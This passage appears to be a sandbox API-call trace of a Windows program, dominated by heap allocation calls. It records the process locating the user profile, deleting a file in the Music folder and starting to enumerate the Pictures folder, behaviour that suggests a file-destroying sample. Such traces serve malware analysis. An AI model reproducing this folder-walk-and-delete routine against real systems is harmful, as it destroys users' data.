0x2466e10 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0254.367] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", lpFilePart=0x8bedfc*="XeP-i8.m4a") returned 0x2e [0254.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0254.367] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xep-i8.m4a")) returned 0x20 [0254.367] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31000460, ftCreationTime.dwHighDateTime=0x1d4d30c, ftLastAccessTime.dwLowDateTime=0x5e0e5bf0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0x5e0e5bf0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x267b, dwReserved0=0x1476, dwReserved1=0x4, cFileName="XeP-i8.m4a", cAlternateFileName="")) returned 0xaa5860 [0254.367] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xep-i8.m4a")) returned 1 [0254.368] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31000460, ftCreationTime.dwHighDateTime=0x1d4d30c, ftLastAccessTime.dwLowDateTime=0x5e0e5bf0, ftLastAccessTime.dwHighDateTime=0x1d4d0be, ftLastWriteTime.dwLowDateTime=0x5e0e5bf0, ftLastWriteTime.dwHighDateTime=0x1d4d0be, nFileSizeHigh=0x0, nFileSizeLow=0x267b, dwReserved0=0x1476, dwReserved1=0x4, cFileName="XeP-i8.m4a", cAlternateFileName="")) returned 0 [0254.368] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0254.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.369] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0254.369] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0254.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0254.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa808 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.370] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0254.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5e) returned 0x240da88 [0254.372] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a", lpFilePart=0x8bf658*="XeP-i8.m4a") returned 0x2e [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0254.372] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XeP-i8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xep-i8.m4a")) returned 0xffffffff [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.372] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0254.372] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0254.372] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0254.372] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.373] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0254.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0254.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.373] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0254.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.374] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf2c0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0254.375] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.375] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0254.375] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.375] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.375] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0254.376] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.376] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0254.376] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0254.376] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.377] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x60) returned 0x240da88 [0254.377] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xceecdad0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xceecdad0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0536, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0xaa5860 [0254.377] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xceecdad0, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xceecdad0, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0536, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0254.377] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b71c20, ftCreationTime.dwHighDateTime=0x1d4d291, ftLastAccessTime.dwLowDateTime=0x8823d4a0, ftLastAccessTime.dwHighDateTime=0x1d4cfca, ftLastWriteTime.dwLowDateTime=0x8823d4a0, ftLastWriteTime.dwHighDateTime=0x1d4cfca, nFileSizeHigh=0x0, nFileSizeLow=0xf4a4, dwReserved0=0x4a0536, dwReserved1=0x60, cFileName="-6 V-28Zs1i2mga0e.png", cAlternateFileName="-6V-28~1.PNG")) returned 1 [0254.377] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2c) returned 0x24b3500 [0254.378] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.378] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.378] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0254.378] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0254.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.378] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 